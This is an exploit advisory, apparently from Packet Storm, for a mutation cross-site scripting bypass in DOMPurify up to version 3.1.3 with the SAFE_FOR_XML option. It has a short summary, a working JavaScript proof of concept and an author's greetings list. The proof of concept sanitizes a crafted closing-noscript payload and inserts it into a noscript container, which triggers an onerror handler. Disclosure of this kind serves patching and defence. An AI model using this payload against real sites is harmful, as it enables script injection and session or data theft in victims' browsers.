Share
## https://sploitus.com/exploit?id=PACKETSTORM:216757
=============================================================================================================================================
    | # Title     : DOMPurify ≀ 3.1.3 Mutation XSS via <noscript> Tag Bypass with SAFE_FOR_XML                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.npmjs.com/package/dompurify                                                                                     |
    =============================================================================================================================================
    
    [+] Summary    : A Mutation Cross-Site Scripting (mXSS) vulnerability exists in DOMPurify versions ≀ 3.1.3 when the SAFE_FOR_XML configuration is enabled. 
                     Due to improper handling of the </noscript> closing tag during sanitization, a crafted payload can bypass filtering mechanisms. 
    				 The sanitizer processes the input as inert text, while the browser's HTML parser interprets it as executable markup when inserted into a <noscript> context. 
                     This parsing discrepancy allows attackers to inject malicious HTML elements (e.g., <img onerror>), leading to arbitrary JavaScript execution in the victim’s browser.
    			  
    [+] POC   :  
    
    import DOMPurify from 'dompurify';
    
    const payload = `</noscript><img src=x onerror=alert(1)>`;
    
    const config = {
      SAFE_FOR_XML: true
    };
    
    const clean = DOMPurify.sanitize(payload, config);
    
    console.log("Sanitized output:", clean);
    
    const container = document.createElement("div");
    container.innerHTML = `<noscript>${clean}</noscript>`;
    
    document.body.appendChild(container);
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================